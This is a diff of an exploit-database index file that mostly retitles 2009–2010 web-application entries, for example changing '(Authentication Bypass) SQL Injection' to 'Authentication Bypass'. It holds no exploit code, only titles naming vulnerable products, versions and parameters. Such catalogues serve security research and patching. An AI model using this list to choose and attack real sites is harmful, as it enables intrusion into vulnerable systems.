9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0
|
||||
9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0
|
||||
9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Authentication Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0
|
||||
9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,php,webapps,0
|
||||
9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0
|
||||
9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0
|
||||
9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,php,webapps,0
|
||||
9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0
|
||||
9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,php,webapps,0
|
||||
9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0
|
||||
|
|
@ -21512,7 +21515,7 @@ id,file,description,date,author,platform,type,port
|
|||
9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps,0
|
||||
9491,platforms/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0
|
||||
9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0
|
||||
9494,platforms/php/webapps/9494.txt,"humanCMS - (Authentication Bypass) SQL Injection",2009-08-24,next,php,webapps,0
|
||||
9494,platforms/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps,0
|
||||
9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Parameter Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0
|
||||
9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - (rating.php) SQL Injection",2009-08-24,Bgh7,php,webapps,0
|
||||
9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0
|
||||
|
|
@ -21589,12 +21592,12 @@ id,file,description,date,author,platform,type,port
|
|||
9656,platforms/php/webapps/9656.txt,"Aurora CMS 1.0.2 - (install.plugin.php) Remote File Inclusion",2009-09-14,"EA Ngel",php,webapps,0
|
||||
9665,platforms/php/webapps/9665.pl,"PHP Pro Bid - Blind SQL Injection",2009-09-14,NoGe,php,webapps,0
|
||||
9669,platforms/php/webapps/9669.txt,"Bs Counter 2.5.3 - (page) SQL Injection",2009-09-14,Bgh7,php,webapps,0
|
||||
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - (Authentication Bypass) SQL Injection",2009-09-15,snakespc,php,webapps,0
|
||||
9674,platforms/php/webapps/9674.txt,"Three Pillars Help Desk 3.0 - Authentication Bypass",2009-09-15,snakespc,php,webapps,0
|
||||
9675,platforms/asp/webapps/9675.txt,"HotWeb Rentals - 'details.asp PropId' Blind SQL Injection",2009-09-15,R3d-D3V!L,asp,webapps,0
|
||||
9681,platforms/php/webapps/9681.txt,"efront 3.5.4 - (database.php path) Remote File Inclusion",2009-09-15,cr4wl3r,php,webapps,0
|
||||
9692,platforms/php/webapps/9692.txt,"iBoutique.MALL 1.2 - (cat) Blind SQL Injection",2009-09-15,InjEctOr5,php,webapps,0
|
||||
9693,platforms/php/webapps/9693.txt,"Joomla! Component com_djcatalog - SQL Injection / Blind SQL Injection",2009-09-15,"Chip d3 bi0s",php,webapps,0
|
||||
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - (Authentication Bypass) SQL Injection",2009-09-16,snakespc,php,webapps,0
|
||||
9696,platforms/php/webapps/9696.txt,"AdsDX 3.05 - Authentication Bypass",2009-09-16,snakespc,php,webapps,0
|
||||
9697,platforms/php/webapps/9697.txt,"Joomla! Component com_foobla_suggestions (idea_id) 1.5.11 - SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
9698,platforms/php/webapps/9698.pl,"Joomla! Component com_jlord_rss - 'id' Blind SQL Injection",2009-09-16,"Chip d3 bi0s",php,webapps,0
|
||||
9699,platforms/php/webapps/9699.txt,"Micro CMS 3.5 - SQL Injection / Local File Inclusion",2009-09-16,"learn3r hacker",php,webapps,0
|
||||
|
|
@ -21605,7 +21608,7 @@ id,file,description,date,author,platform,type,port
|
|||
9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0
|
||||
9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - Authentication Bypass",2009-09-17,"learn3r hacker",php,webapps,0
|
||||
9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
|
||||
9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0
|
||||
9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0
|
||||
|
|
@ -21755,7 +21758,7 @@ id,file,description,date,author,platform,type,port
|
|||
10218,platforms/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
|
||||
10219,platforms/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
|
||||
10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,cr4wl3r,php,webapps,0
|
||||
10222,platforms/php/webapps/10222.txt,"W3infotech - (Authentication Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0
|
||||
10222,platforms/php/webapps/10222.txt,"W3infotech - Authentication Bypass",2009-11-24,ViRuS_HiMa,php,webapps,0
|
||||
10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery",2009-11-24,"Alice Kaerast",php,webapps,0
|
||||
10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL Injection",2006-05-26,KOUSULIN,windows,webapps,1000
|
||||
10227,platforms/php/webapps/10227.txt,"Joomla! Component com_mygallery - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0
|
||||
|
|
@ -21824,13 +21827,13 @@ id,file,description,date,author,platform,type,port
|
|||
10356,platforms/php/webapps/10356.txt,"Joomla! Component com_job - (showMoreUse) SQL Injection",2009-12-08,Palyo34,php,webapps,0
|
||||
10357,platforms/php/webapps/10357.txt,"Alqatari group 1.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
|
||||
10358,platforms/php/webapps/10358.txt,"AlefMentor 2.0 <= 5.0 - 'id' SQL Injection",2009-12-08,Red-D3v1L,php,webapps,0
|
||||
10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - (Authentication Bypass) SQL Injection",2009-12-09,"AnTi SeCuRe",php,webapps,0
|
||||
10361,platforms/php/webapps/10361.txt,"Real Estate Portal X.0 - Authentication Bypass",2009-12-09,"AnTi SeCuRe",php,webapps,0
|
||||
10364,platforms/php/webapps/10364.txt,"TestLink Test Management and Execution System - Multiple Cross-Site Scripting / Injection Vulnerabilities",2009-12-09,"Core Security",php,webapps,0
|
||||
10366,platforms/php/webapps/10366.txt,"Joomla! Component com_jsjobs 1.0.5.6 - SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
|
||||
10367,platforms/php/webapps/10367.txt,"Joomla! Component com_jphoto - 'id' SQL Injection",2009-12-10,kaMtiEz,php,webapps,0
|
||||
10368,platforms/asp/webapps/10368.txt,"Free ASP Upload - Arbitrary File Upload",2009-12-10,Mr.aFiR,asp,webapps,0
|
||||
10369,platforms/php/webapps/10369.txt,"Joomla! Component Mamboleto 2.0 RC3 - Remote File Inclusion",2009-12-10,"Don Tukulesto",php,webapps,0
|
||||
10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Remote Authentication Bypass (SQL Injection)",2009-12-10,mr_me,php,webapps,0
|
||||
10370,platforms/php/webapps/10370.txt,"PHP Inventory 1.2 - Authentication Bypass",2009-12-10,mr_me,php,webapps,0
|
||||
10372,platforms/aix/webapps/10372.txt,"OPMANAGER - Blind SQL Injection / XPath Injection",2009-12-10,"Asheesh kumar Mani Tripathi",aix,webapps,0
|
||||
10376,platforms/windows/webapps/10376.txt,"Billwerx RC 3.1 - Multiple Vulnerabilities",2009-12-11,mr_me,windows,webapps,80
|
||||
10378,platforms/php/webapps/10378.txt,"Nuggetz CMS 1.0 - Remote Code Execution",2009-12-10,"Amol Naik",php,webapps,0
|
||||
|
|
@ -21895,9 +21898,9 @@ id,file,description,date,author,platform,type,port
|
|||
10462,platforms/php/webapps/10462.txt,"DubSite CMS 1.0 - Cross-Site Request Forgery",2009-12-15,Connection,php,webapps,0
|
||||
10463,platforms/php/webapps/10463.txt,"iGaming CMS 1.5 - Cross-Site Request Forgery",2009-12-15,Nex,php,webapps,0
|
||||
10464,platforms/asp/webapps/10464.txt,"GalleryPal FE 1.5 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
|
||||
10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - (Authentication Bypass) SQL Injection",2009-12-15,R3d-D3V!L,asp,webapps,0
|
||||
10465,platforms/asp/webapps/10465.txt,"SitePal 1.1 - Authentication Bypass",2009-12-15,R3d-D3V!L,asp,webapps,0
|
||||
10467,platforms/php/webapps/10467.txt,"family connections 2.1.3 - Multiple Vulnerabilities",2009-12-16,"Salvatore Fresta",php,webapps,0
|
||||
10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 <= 1.0 - (Authentication Bypass) SQL Injection",2009-12-16,Red-D3v1L,asp,webapps,0
|
||||
10470,platforms/asp/webapps/10470.txt,"JM CMS 1.0 - Authentication Bypass",2009-12-16,Red-D3v1L,asp,webapps,0
|
||||
10472,platforms/php/webapps/10472.txt,"Recipe Script 5.0 - Arbitrary File Upload / Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
10473,platforms/asp/webapps/10473.txt,"V-SpacePal - SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10474,platforms/php/webapps/10474.txt,"Article Directory - SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
|
|
@ -21910,17 +21913,17 @@ id,file,description,date,author,platform,type,port
|
|||
10483,platforms/asp/webapps/10483.txt,"GuestBookPro Script - Remote Database Disclosure",2009-12-16,ViRuSMaN,asp,webapps,0
|
||||
10485,platforms/php/webapps/10485.txt,"Drupal Module Sections - Cross-Site Scripting",2009-12-16,"Justin C. Klein Keane",php,webapps,0
|
||||
10488,platforms/php/webapps/10488.txt,"WordPress Plugin WP-Forum 2.3 - SQL Injection / Blind SQL Injection",2009-12-16,"Juan Galiana Lara",php,webapps,0
|
||||
10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10492,platforms/php/webapps/10492.txt,"Pre Hospital Management System - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10493,platforms/php/webapps/10493.txt,"WHMCompleteSolution CMS - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
10494,platforms/php/webapps/10494.txt,"D-Tendencia Bt 2008 - SQL Injection",2009-12-16,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
|
||||
10495,platforms/php/webapps/10495.txt,"PhpLinkExchange 1.02 - Cross-Site Scripting / Upload",2009-12-16,Stink',php,webapps,0
|
||||
10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10496,platforms/asp/webapps/10496.txt,"Digiappz Freekot - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10497,platforms/php/webapps/10497.txt,"File Share 1.0 - SQL Injection",2009-12-16,"TOP SAT 13",php,webapps,0
|
||||
10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
|
||||
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - Authentication Bypass",2009-12-16,R3d-D3V!L,php,webapps,0
|
||||
10501,platforms/asp/webapps/10501.txt,"Texas Rankem - 'player_id' Parameter SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10502,platforms/asp/webapps/10502.txt,"PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10503,platforms/asp/webapps/10503.txt,"ASPGuest - 'edit.asp ID' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10504,platforms/asp/webapps/10504.txt,"Smart ASPad - 'campaignEdit.asp CCam' Blind SQL Injection",2009-12-16,R3d-D3V!L,asp,webapps,0
|
||||
10505,platforms/asp/webapps/10505.txt,"Multi-Lingual Application - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0
|
||||
|
|
@ -21962,7 +21965,7 @@ id,file,description,date,author,platform,type,port
|
|||
10562,platforms/php/webapps/10562.txt,"Ptag 4.0.0 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0
|
||||
10564,platforms/php/webapps/10564.txt,"Saurus CMS 4.6.4 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0
|
||||
10566,platforms/php/webapps/10566.txt,"Explorer 7.20 - Cross-Site Scripting",2009-12-20,Metropolis,php,webapps,0
|
||||
10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - (Authentication Bypass) SQL Injection",2009-12-20,PaL-D3v1L,php,webapps,0
|
||||
10567,platforms/php/webapps/10567.txt,"Advance Biz Limited 1.0 - Authentication Bypass",2009-12-20,PaL-D3v1L,php,webapps,0
|
||||
10568,platforms/php/webapps/10568.txt,"Simplicity oF Upload 1.3.2 - Arbitrary File Upload",2009-12-20,"Master Mind",php,webapps,0
|
||||
10569,platforms/php/webapps/10569.txt,"Ignition 1.2 - Multiple Local File Inclusion",2009-12-20,cOndemned,php,webapps,0
|
||||
10570,platforms/php/webapps/10570.txt,"Pandora FMS Monitoring Application 2.1.x / 3.x - SQL Injection",2009-12-20,Global-Evolution,php,webapps,0
|
||||
|
|
@ -22147,8 +22150,8 @@ id,file,description,date,author,platform,type,port
|
|||
10824,platforms/php/webapps/10824.txt,"K-Rate - SQL Injection",2009-12-30,e.wiZz,php,webapps,0
|
||||
10828,platforms/php/webapps/10828.txt,"vBulletin ads_saed 1.5 - 'bnnr.php' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10830,platforms/php/webapps/10830.txt,"Azadi Network - (page) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - (Authentication Bypass) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10831,platforms/php/webapps/10831.txt,"e-topbiz banner exchange PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0
|
||||
10832,platforms/php/webapps/10832.txt,"e-topbiz Slide Popups 1 PHP - Authentication Bypass",2009-12-30,"Hussin X",php,webapps,0
|
||||
10833,platforms/php/webapps/10833.txt,"Classifieds Script - (type) SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
10835,platforms/php/webapps/10835.txt,"Jax Calendar 1.34 - Remote Admin Access Exploit",2009-12-30,Sora,php,webapps,0
|
||||
10836,platforms/php/webapps/10836.txt,"Elkagroup - 'pid' SQL Injection",2009-12-30,"Hussin X",php,webapps,0
|
||||
|
|
@ -22163,7 +22166,7 @@ id,file,description,date,author,platform,type,port
|
|||
10850,platforms/php/webapps/10850.txt,"HLstatsX 1.65 - SQL Injection",2009-12-31,bnc,php,webapps,0
|
||||
10861,platforms/php/webapps/10861.txt,"Discuz 1.03 - SQL Injection",2009-12-31,indoushka,php,webapps,0
|
||||
10869,platforms/php/webapps/10869.txt,"PhotoDiary 1.3 - (lng) Local File Inclusion",2009-12-31,cOndemned,php,webapps,0
|
||||
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - (Authentication Bypass) SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
10871,platforms/php/webapps/10871.txt,"Freewebscript'z Games - Authentication Bypass",2009-12-31,"Hussin X",php,webapps,0
|
||||
10872,platforms/php/webapps/10872.txt,"Pre ADS Portal - 'cid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
10873,platforms/php/webapps/10873.txt,"EasyGallery - 'catid' Parameter Blind SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
10874,platforms/php/webapps/10874.txt,"Pre News Manager - 'nid' Parameter SQL Injection",2009-12-31,"Hussin X",php,webapps,0
|
||||
|
|
@ -22179,10 +22182,10 @@ id,file,description,date,author,platform,type,port
|
|||
10891,platforms/php/webapps/10891.txt,"UCStats 1.1 - SQL Injection",2010-01-01,Sora,php,webapps,0
|
||||
10897,platforms/php/webapps/10897.txt,"WD-CMS 3.0 - Multiple Vulnerabilities",2010-01-01,Sora,php,webapps,0
|
||||
10899,platforms/php/webapps/10899.txt,"XlentCMS 1.0.4 - (downloads.php?cat) SQL Injection",2010-01-01,Gamoscu,php,webapps,0
|
||||
10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass (SQL Injection)",2010-01-01,R3d-D3V!L,php,webapps,0
|
||||
10901,platforms/php/webapps/10901.txt,"DZOIC Handshakes - Authentication Bypass",2010-01-01,R3d-D3V!L,php,webapps,0
|
||||
10903,platforms/asp/webapps/10903.txt,"Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities",2010-01-01,LionTurk,asp,webapps,0
|
||||
10905,platforms/php/webapps/10905.txt,"Joomla! Component com_avosbillets - Blind SQL Injection",2010-01-01,Pyske,php,webapps,0
|
||||
10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass (SQL Injection)",2010-01-02,R3d-D3V!L,php,webapps,0
|
||||
10906,platforms/php/webapps/10906.txt,"DZOIC ClipHouse - Authentication Bypass",2010-01-02,R3d-D3V!L,php,webapps,0
|
||||
10910,platforms/php/webapps/10910.txt,"HLstatsX Community Edition 1.6.5 - Cross-Site Scripting",2010-01-02,Sora,php,webapps,0
|
||||
10912,platforms/php/webapps/10912.txt,"Proxyroll.com Clone PHP Script - Cookie Handling",2010-01-02,DigitALL,php,webapps,0
|
||||
10921,platforms/php/webapps/10921.txt,"eazyPortal 1.0.0 - Multiple Vulnerabilities",2010-01-02,"Milos Zivanovic",php,webapps,0
|
||||
|
|
@ -22373,7 +22376,7 @@ id,file,description,date,author,platform,type,port
|
|||
11319,platforms/php/webapps/11319.txt,"MYRE Classified - (cat) SQL Injection",2010-02-02,kaMtiEz,php,webapps,0
|
||||
11321,platforms/php/webapps/11321.txt,"MobPartner Chat - Multiple SQL Injections",2010-02-02,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11322,platforms/php/webapps/11322.txt,"KubeLance 1.7.6 - Cross-Site Request Forgery (Add Admin)",2010-02-03,"Milos Zivanovic",php,webapps,0
|
||||
11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - (Authentication Bypass) SQL Injection",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0
|
||||
11323,platforms/php/webapps/11323.txt,"PHP Car Rental-Script - Authentication Bypass",2010-02-03,"Hamza 'MizoZ' N.",php,webapps,0
|
||||
11324,platforms/jsp/webapps/11324.txt,"Hipergate 4.0.12 - Multiple Vulnerabilities",2010-02-03,"Nahuel Grisolia",jsp,webapps,0
|
||||
11325,platforms/php/webapps/11325.txt,"RealAdmin - 'detail.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11326,platforms/php/webapps/11326.txt,"cityadmin - 'links.php' Blind SQL Injection",2010-02-03,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
|
|
@ -22387,16 +22390,16 @@ id,file,description,date,author,platform,type,port
|
|||
11340,platforms/php/webapps/11340.txt,"odlican.net CMS 1.5 - Arbitrary File Upload",2010-02-06,anonymous,php,webapps,0
|
||||
11341,platforms/php/webapps/11341.txt,"ShopEx Single 4.5.1 - Multiple Vulnerabilities",2010-02-06,cp77fk4r,php,webapps,0
|
||||
11344,platforms/php/webapps/11344.txt,"WSN Guest - Database Disclosure",2010-02-07,HackXBack,php,webapps,0
|
||||
11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11345,platforms/php/webapps/11345.txt,"Zen Tracking 2.2 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11346,platforms/php/webapps/11346.txt,"Baal Systems 3.8 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11348,platforms/asp/webapps/11348.txt,"DA Mailing List System 2 - Multiple Vulnerabilities",2010-02-07,Phenom,asp,webapps,0
|
||||
11349,platforms/php/webapps/11349.txt,"Exponent CMS 0.96.3 - (articlemodule) SQL Injection",2010-02-07,"T u R c O",php,webapps,0
|
||||
11350,platforms/php/webapps/11350.txt,"Belkatalog CMS - SQL Injection",2010-02-07,anonymous,php,webapps,0
|
||||
11352,platforms/php/webapps/11352.txt,"Joomla! Component com_productbook - SQL Injection",2010-02-07,snakespc,php,webapps,0
|
||||
11353,platforms/php/webapps/11353.txt,"Croogo 1.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-07,"Milos Zivanovic",php,webapps,0
|
||||
11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11354,platforms/php/webapps/11354.txt,"Killmonster 2.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11355,platforms/php/webapps/11355.txt,"EncapsCMS 0.3.6 - (config[path]) Remote File Inclusion",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - (Authentication Bypass) SQL Injection",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11356,platforms/php/webapps/11356.txt,"Rostermain 1.1 - Authentication Bypass",2010-02-07,cr4wl3r,php,webapps,0
|
||||
11357,platforms/php/webapps/11357.txt,"Uiga Business Portal - SQL Injection / Cross-Site Scripting",2010-02-07,"Sioma Labs",php,webapps,0
|
||||
11358,platforms/php/webapps/11358.txt,"TinyMCE WYSIWYG Editor - Multiple Vulnerabilities",2010-02-07,mc2_s3lector,php,webapps,0
|
||||
11359,platforms/php/webapps/11359.txt,"JaxCMS 1.0 - Local File Inclusion",2010-02-08,"Hamza 'MizoZ' N.",php,webapps,0
|
||||
|
|
@ -22404,7 +22407,7 @@ id,file,description,date,author,platform,type,port
|
|||
11361,platforms/asp/webapps/11361.txt,"fipsForum 2.6 - Remote Database Disclosure",2010-02-09,ViRuSMaN,asp,webapps,0
|
||||
11365,platforms/php/webapps/11365.txt,"CPA Site Solutions - Arbitrary File Upload",2010-02-09,R3VAN_BASTARD,php,webapps,0
|
||||
11366,platforms/php/webapps/11366.txt,"NewsLetter Tailor - Database Backup Dump",2010-02-09,ViRuSMaN,php,webapps,0
|
||||
11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - (Authentication Bypass) SQL Injection",2010-02-09,ViRuSMaN,php,webapps,0
|
||||
11367,platforms/php/webapps/11367.txt,"NewsLetter Tailor - Authentication Bypass",2010-02-09,ViRuSMaN,php,webapps,0
|
||||
11368,platforms/php/webapps/11368.txt,"Yes Solutions - Webapp SQL Injection",2010-02-09,HackXBack,php,webapps,0
|
||||
11369,platforms/asp/webapps/11369.txt,"MOJO's IWms 7 - SQL Injection / Cross-Site Scripting",2010-02-09,cp77fk4r,asp,webapps,0
|
||||
11375,platforms/php/webapps/11375.txt,"Zomorrod CMS - SQL Injection",2010-02-09,"Pouya Daneshmand",php,webapps,0
|
||||
|
|
@ -22440,7 +22443,7 @@ id,file,description,date,author,platform,type,port
|
|||
11430,platforms/php/webapps/11430.txt,"southburn Web - 'products.php' SQL Injection",2010-02-13,AtT4CKxT3rR0r1ST,php,webapps,0
|
||||
11431,platforms/php/webapps/11431.txt,"MRW PHP Upload - Arbitrary File Upload",2010-02-13,Phenom,php,webapps,0
|
||||
11434,platforms/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,php,webapps,0
|
||||
11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - (orderlinks) SQL Injection",2010-02-13,Gamoscu,php,webapps,0
|
||||
11436,platforms/php/webapps/11436.txt,"WSN Guest 1.02 - 'orderlinks' Parameter SQL Injection",2010-02-13,Gamoscu,php,webapps,0
|
||||
11437,platforms/php/webapps/11437.txt,"ZeusCMS 0.2 - Database Backup Dump / Local File Inclusion",2010-02-13,ViRuSMaN,php,webapps,0
|
||||
11440,platforms/php/webapps/11440.txt,"InterTech Co 1.0 - SQL Injection",2010-02-13,Red-D3v1L,php,webapps,0
|
||||
11441,platforms/php/webapps/11441.txt,"WordPress 2.9 - Failure to Restrict URL Access",2010-02-13,tmacuk,php,webapps,0
|
||||
|
|
@ -22532,23 +22535,23 @@ id,file,description,date,author,platform,type,port
|
|||
11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,aix,webapps,0
|
||||
11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0
|
||||
11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0
|
||||
11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11586,platforms/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11587,platforms/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusion",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11588,platforms/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps,0
|
||||
11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps,0
|
||||
11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps,0
|
||||
11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - (Authentication Bypass) SQL Injection",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11593,platforms/php/webapps/11593.txt,"Uiga Fan Club 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0
|
||||
11595,platforms/php/webapps/11595.php,"Joomla! Component com_paxgallery - Blind Injection",2010-02-27,snakespc,php,webapps,0
|
||||
